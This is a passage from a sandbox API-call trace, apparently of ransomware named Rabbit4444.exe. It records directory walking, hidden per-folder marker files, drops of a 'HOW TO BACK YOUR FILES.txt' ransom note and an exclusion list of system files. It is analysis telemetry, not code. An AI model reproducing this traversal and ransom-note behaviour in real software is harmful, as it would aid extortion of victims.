to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.544] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.544] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.544] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.544] CloseHandle (hObject=0x278) returned 1 [0052.544] CloseHandle (hObject=0x27c) returned 1 [0052.544] GetCurrentThreadId () returned 0xd98 [0052.544] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1204d8 [0052.544] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery" [0052.544] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0052.544] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1204d0 | out: hHeap=0xe0000) returned 1 [0052.544] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery" [0052.544] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\" [0052.544] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\.BFC0E91B00AE8A0620D3" [0052.544] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\stationery\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.547] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.550] FlushFileBuffers (hFile=0x27c) returned 1 [0052.551] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.551] CloseHandle (hObject=0x27c) returned 1 [0052.552] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery") returned 52 [0052.552] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.552] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd38d4b92, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xd38d4b92, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xe8a5d2d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0052.552] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.552] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.552] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.552] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.552] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd38d4b92, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xd38d4b92, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xe8a5d2d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.552] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.552] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.552] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.552] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.552] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.552] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8a37111, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8a37111, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8a5d2d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.552] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.552] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.552] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8a37111, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8a37111, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8a5d2d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.552] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0052.553] lstrcpyW (in: lpString1=0x130eba2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.553] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\stationery\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.553] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.553] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.553] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.553] CloseHandle (hObject=0x278) returned 1 [0052.553] CloseHandle (hObject=0x27c) returned 1 [0052.553] GetCurrentThreadId () returned 0xd98 [0052.554] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120618 [0052.554] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech" [0052.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xef9c0 | out: hHeap=0xe0000) returned 1 [0052.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120610 | out: hHeap=0xe0000) returned 1 [0052.554] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech" [0052.554] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\" [0052.554] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\.BFC0E91B00AE8A0620D3" [0052.554] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.556] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.558] FlushFileBuffers (hFile=0x27c) returned 1 [0052.559] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.559] CloseHandle (hObject=0x27c) returned 1 [0052.560] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech") returned 48 [0052.560] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.560] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7161656c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe8a5d2d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0052.560] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.560] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.560] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.560] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.560] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7161656c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe8a5d2d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.560] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.560] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.560] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.560] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.560] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.560] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8a5d2d8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8a5d2d8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8a5d2d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.560] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.560] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.560] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Files", cAlternateFileName="")) returned 1 [0052.560] lstrcmpiW (lpString1="Files", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.560] lstrcmpiW (lpString1="Files", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.560] lstrcmpiW (lpString1="Files", lpString2="Rabbit4444.exe") returned -1 [0052.561] lstrcmpiW (lpString1="Files", lpString2=".") returned 1 [0052.561] lstrcmpiW (lpString1="Files", lpString2="..") returned 1 [0052.561] lstrcmpiW (lpString1="Files", lpString2="windows") returned -1 [0052.561] lstrcmpiW (lpString1="Files", lpString2="bootmgr") returned 1 [0052.561] lstrcmpiW (lpString1="Files", lpString2="pagefile.sys") returned -1 [0052.561] lstrcmpiW (lpString1="Files", lpString2="boot") returned 1 [0052.561] lstrcmpiW (lpString1="Files", lpString2="ids.txt") returned -1 [0052.561] lstrcmpiW (lpString1="Files", lpString2="NTUSER.DAT") returned -1 [0052.561] lstrcpyW (in: lpString1=0x130eb9a, lpString2="Files" | out: lpString1="Files") returned="Files" [0052.561] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1207b0 [0052.561] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6e) returned 0x1177e8 [0052.561] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1207b8 | out: ListHead=0xf68b0, ListEntry=0x1207b8) returned 0x120598 [0052.561] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Files", cAlternateFileName="")) returned 0 [0052.561] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0052.561] lstrcpyW (in: lpString1=0x130eb9a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.561] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.561] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.561] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.562] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.562] CloseHandle (hObject=0x278) returned 1 [0052.562] CloseHandle (hObject=0x27c) returned 1 [0052.562] GetCurrentThreadId () returned 0xd98 [0052.562] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1207b8 [0052.562] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files" [0052.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0052.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1207b0 | out: hHeap=0xe0000) returned 1 [0052.562] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files" [0052.562] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\" [0052.562] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\.BFC0E91B00AE8A0620D3" [0052.562] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\files\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.563] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.568] FlushFileBuffers (hFile=0x27c) returned 1 [0052.569] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.569] CloseHandle (hObject=0x27c) returned 1 [0052.570] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files") returned 54 [0052.570] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.570] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe8a83813, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0052.570] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.570] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.570] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.570] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.570] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe8a83813, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.570] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.570] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.570] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.570] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.570] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.570] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8a83813, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8a83813, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8a83813, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.570] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.570] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.570] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserLexicons", cAlternateFileName="USERLE~1")) returned 1 [0052.570] lstrcmpiW (lpString1="UserLexicons", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.570] lstrcmpiW (lpString1="UserLexicons", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.570] lstrcmpiW (lpString1="UserLexicons", lpString2="Rabbit4444.exe") returned 1 [0052.570] lstrcmpiW (lpString1="UserLexicons", lpString2=".") returned 1 [0052.570] lstrcmpiW (lpString1="UserLexicons", lpString2="..") returned 1 [0052.570] lstrcmpiW (lpString1="UserLexicons", lpString2="windows") returned -1 [0052.570] lstrcmpiW (lpString1="UserLexicons", lpString2="bootmgr") returned 1 [0052.570] lstrcmpiW (lpString1="UserLexicons", lpString2="pagefile.sys") returned 1 [0052.570] lstrcmpiW (lpString1="UserLexicons", lpString2="boot") returned 1 [0052.570] lstrcmpiW (lpString1="UserLexicons", lpString2="ids.txt") returned 1 [0052.570] lstrcmpiW (lpString1="UserLexicons", lpString2="NTUSER.DAT") returned 1 [0052.570] lstrcpyW (in: lpString1=0x130eba6, lpString2="UserLexicons" | out: lpString1="UserLexicons") returned="UserLexicons" [0052.571] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1207f0 [0052.571] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x88) returned 0x1060c0 [0052.571] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1207f8 | out: ListHead=0xf68b0, ListEntry=0x1207f8) returned 0x120598 [0052.571] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserLexicons", cAlternateFileName="USERLE~1")) returned 0 [0052.571] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0052.571] lstrcpyW (in: lpString1=0x130eba6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.571] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\files\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.572] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.572] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.573] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.573] CloseHandle (hObject=0x278) returned 1 [0052.573] CloseHandle (hObject=0x27c) returned 1 [0052.573] GetCurrentThreadId () returned 0xd98 [0052.573] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1207f8 [0052.573] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons") 